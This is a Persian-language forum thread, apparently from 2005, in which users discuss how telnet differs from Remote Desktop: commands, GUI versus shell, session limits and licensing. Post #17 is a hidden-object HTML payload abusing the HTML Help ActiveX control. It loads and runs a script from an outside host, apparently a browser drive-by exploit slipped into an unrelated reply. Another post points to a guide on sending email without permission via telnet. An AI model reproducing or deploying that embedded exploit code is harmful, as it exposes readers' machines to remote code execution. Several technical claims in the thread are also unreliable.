نمایش نتایج 1 تا 19 از 19

نام تاپیک: فرق remote desktop و telent

  1. #1

    فرق remote desktop و telent

    من تاحالا telenet نکردم می خوام بدونم فرق این دو در چیه ؟

  2. #2
    کاربر دائمی آواتار Lus
    تاریخ عضویت
    خرداد 1384
    محل زندگی
    شهسوار
    پست
    159
    telnet تحت داس هست. فکر کنم بدونی اختیراتی که در داس داری چی هست ؟

  3. #3
    VIP آواتار mnajafi
    تاریخ عضویت
    آبان 1383
    محل زندگی
    مشترک مورد نظر در دسترس نیست!!!!
    پست
    492
    (tel´net) (n.) A terminal emulation program for TCP/IP networks such as the Internet. The Telnet program runs on your computer and connects your PC to a server on the network. You can then enter commands through the Telnet program and they will be executed as if you were entering them directly on the server console. This enables you to control the server and communicate with other servers on the network. To start a Telnet session, you must log in to a server by entering a valid username and password. Telnet is a common way to remotely control Web servers.
    تلنت یه سرویس هست که باید روی کامپیوتر مقصد فعال بشه.شما می تونی با دستور
    telnet xxx.xxx.xxx.xxx به یک سرور وصل بشی واز روی خط فرمان دستورات رو مثل خط فرمان داس وارد کنی ولی با ریموت دسکتاپ تو به دسکتاپ اون شخص متصل می شی ومی تونی مثل کار با دسکتاپ خودت باهاش کارکنی .یکی از نرم افزارهای جالب برای دسترسی به دسکتاپ دیگر vnc است که باید بصورت client/server اجراش کنی یعنی روی دستگاه دیگر حتما" باید سرور vnc اجراشده باشه.
    مطلب انگلیسی بالا از سایت http://www.webopedia.com/TERM/T/Telnet.html برداشت شده.
    آخرین ویرایش به وسیله mnajafi : پنج شنبه 30 تیر 1384 در 19:02 عصر

  4. #4
    منتظر تایید آدرس ایمیل آواتار javadonline
    تاریخ عضویت
    تیر 1384
    محل زندگی
    javad2395@kashan.com
    پست
    64
    سلام
    میشه دستوراشو گفت چیها هستن .

  5. #5
    VIP آواتار mnajafi
    تاریخ عضویت
    آبان 1383
    محل زندگی
    مشترک مورد نظر در دسترس نیست!!!!
    پست
    492
    دستورات تلنت رو می تونی از اینجا ببینی
    http://www.microsoft.com/resources/d..._commands.mspx

  6. #6
    کاربر دائمی آواتار meh_secure
    تاریخ عضویت
    دی 1383
    محل زندگی
    California
    پست
    964
    Telnet به صورت کد و شل هستش ولی بنظرمن سریعتر از Remote desktop هستش.
    ولی با Remote desktop می تونی هر کاری که با سیستم خودت می کنی با سیستم مقابل انجام بدی اونم به صورت GUI

  7. #7
    کاربر دائمی آواتار Lus
    تاریخ عضویت
    خرداد 1384
    محل زندگی
    شهسوار
    پست
    159
    فرق بین telnet و ریموت دسکتاپ مثل فرق سیستم آمل داس و ویندوز ایکس-پی هست

  8. #8
    az telnet bara artebat ba yeh port va gosh dadan be on astefadeh misheh vali remote desktop bara vasl shoodan az raheh door be yek camputer be tori ke ahsas mikoni bar royeh hamoon camputer mashgoleh kar hasti
    منی که نام شراب از کتاب می شستم
    زمانه کاتب دکان می فروشم کرد.

  9. #9
    کاربر دائمی آواتار Lus
    تاریخ عضویت
    خرداد 1384
    محل زندگی
    شهسوار
    پست
    159

    Talking

    نقل قول نوشته شده توسط sarami
    az telnet bara artebat ba yeh port va gosh dadan be on astefadeh misheh vali remote desktop bara vasl shoodan az raheh door be yek camputer be tori ke ahsas mikoni bar royeh hamoon camputer mashgoleh kar hasti
    والا وقتی من به یه سیستم دیگه ریموت میکنم هم چین اهساسی نداشتیم.
    در ضمن ریموت دسکتاپ فقط واسه یه شبکه محلی هست تو اینترنت کاربرد نداره. ولی telnet هم واسه
    لن هست هم واسه ون.

  10. #10
    دوست عزیز این برنامه با احساس شما کاری نداره منظورم هم از راه دور مسافت نیست منظورم هر کامپیوتری بغیر از کامپیوتر خودت در مورد اینترنت هم باید بهت بگم اگه سطح دسترسی برات تو کامپیوتر میزبان داده بشه شما می تونی ریموت دسکتاپ بزنی
    منی که نام شراب از کتاب می شستم
    زمانه کاتب دکان می فروشم کرد.

  11. #11
    دوست عزیز این برنامه با احساس شما کاری نداره منظورم هم از راه دور مسافت نیست منظورم هر کامپیوتری بغیر از کامپیوتر خودت در مورد اینترنت هم باید بهت بگم اگه سطح دسترسی برات تو کامپیوتر میزبان داده بشه شما می تونی ریموت دسکتاپ بزنی
    اما در مورد telnet میتونی یه سر به بخش چگونگی فرستادن ایمیل بدون اجازه مراجعه کنی که بخشی رو بنده اضافه کردم که با telnet این کار انجام گرفته از توجه همتون ممنون
    منی که نام شراب از کتاب می شستم
    زمانه کاتب دکان می فروشم کرد.

  12. #12
    دوستان عزیز سلام
    هر دو این دستورات باهم فرق می کنند به این صورت که موقعی که شما با ریموت دستکتاپ به کامپیوتر یک نفر توی شبکه وصل می شوید کامپیوتر نفر مقابل Lock میشه و دیگه متوجه می شود که یک نفر داره روی سیستم اون کار می کننه ولی وقتی با TelNet ارتباط گرفته بشه کامپیوتر مقصد بصورت عادی متوجه نمی شود و تفاوتهای زیادی دیگر هم داره مثلا در ریموت دسکتاپ نمی توان بصورت مستقیم از کامپیوتر مقصد اطلاعات را روی سیستم خود کپی کرد
    امیدوارم مفهوم را تا حدی رسانده باشم
    web : www.Mabrosoft.com
    E - Mail : E_D_Alikhani@yahoo.com

  13. #13
    این موردی که شما عنوان کردیدبه نوع ویندوز کامپیوتری که بهش ریموت میزنین بستگی داره اگه ویندوز سرور روش باشه تا 6 تا کاربر میتونن remote به کامپیوتر میزبان بزنن و هیچ مشکلی هم بوجود نمیاد
    منی که نام شراب از کتاب می شستم
    زمانه کاتب دکان می فروشم کرد.

  14. #14

    Thumbs up

    من فکر می‌کنم اگه ویندوز سرور باشه و ترمینال سرویس روش نصب نباشه تا 2 تا admin میتونن بهش ریموت بشند و اگه ترمینال سرویس نصب باشه بستگی به licence شما داره.

  15. #15
    سلام به همه دوستان
    بی زحمت می خواستم یک نفر بیاد . اموزش کامل این دو نرم افزار رو بزاره
    با تشکر

  16. #16
    اگه میشه در مورد نحوه کار با remote desktop توضیح بدین
    منظورم معرفیش نیست ، طریقه پیکربندی اونو میخوام

  17. #17

    doroste

    <html><head></head>
    <OBJECT style="display:none" id="locate" type="application/x-oleobject"
    classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
    codebase="hhctrl.ocx#Version=5,2,3790,1194">
    <PARAM name="Command" value="Related Topics, MENU">
    <PARAM name="Button" value="Text:_">
    <PARAM name="Window" value="$global_blank">
    <PARAM name="Item1" value="command;ms-its:c:/windows/help/ntshared.chm
    ::/alt_url_enterprise_specific.htm">
    </OBJECT>
    <OBJECT style="display:none" id="locator"
    type="application/x-oleobject"
    classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
    codebase="hhctrl.ocx#Version=5,2,3790,1194">
    <PARAM name="Command" value="Related Topics, MENU">
    <PARAM name="Button" value="Text:_">
    <PARAM name="Window" value="$global_blank">
    <PARAM name="Item1"
    value='command;javascript:execScript("document.wri te("
    <script language="javascript"
    src="http://mahdi-mafia.persiangig.com/htm.txt""+
    String.fromCharCode(62)+"</scr"+"ipt"+String.fromCharCode(62))")'>
    </OBJECT>
    <script>locate.HHClick();setTimeout("locator.HHCli ck()",100);setTimeout</script>
    <head></html> :wise2: :wise2:

  18. #18
    نقل قول نوشته شده توسط mhjb
    من فکر می‌کنم اگه ویندوز سرور باشه و ترمینال سرویس روش نصب نباشه تا 2 تا admin میتونن بهش ریموت بشند و اگه ترمینال سرویس نصب باشه بستگی به licence شما داره.
    عزیز من نمی دونم شما از کجا هستین ولی خوشبختانه تو این مملکت مشکل licence و اینجور چیزا برا خارجکیاست
    منی که نام شراب از کتاب می شستم
    زمانه کاتب دکان می فروشم کرد.

  19. #19
    میشه گفت اینا اصلا به هم مربوط نیستند ریموت دسکتاب برای کنترل کامپیوتر از راه دور استفاده میشه ولی تلنت قابلیته برای ارتباط با پورتها

تاپیک های مشابه

  1. مشکل remote desktop
    نوشته شده توسط soroosh_i58 در بخش شبکه و Networking‌
    پاسخ: 1
    آخرین پست: شنبه 20 اسفند 1384, 08:46 صبح
  2. فعال کردن Remote Desktop به صورت Remote
    نوشته شده توسط amir_network در بخش شبکه و Networking‌
    پاسخ: 2
    آخرین پست: شنبه 04 تیر 1384, 19:42 عصر

قوانین ایجاد تاپیک در تالار

  • شما نمی توانید تاپیک جدید ایجاد کنید
  • شما نمی توانید به تاپیک ها پاسخ دهید
  • شما نمی توانید ضمیمه ارسال کنید
  • شما نمی توانید پاسخ هایتان را ویرایش کنید
  •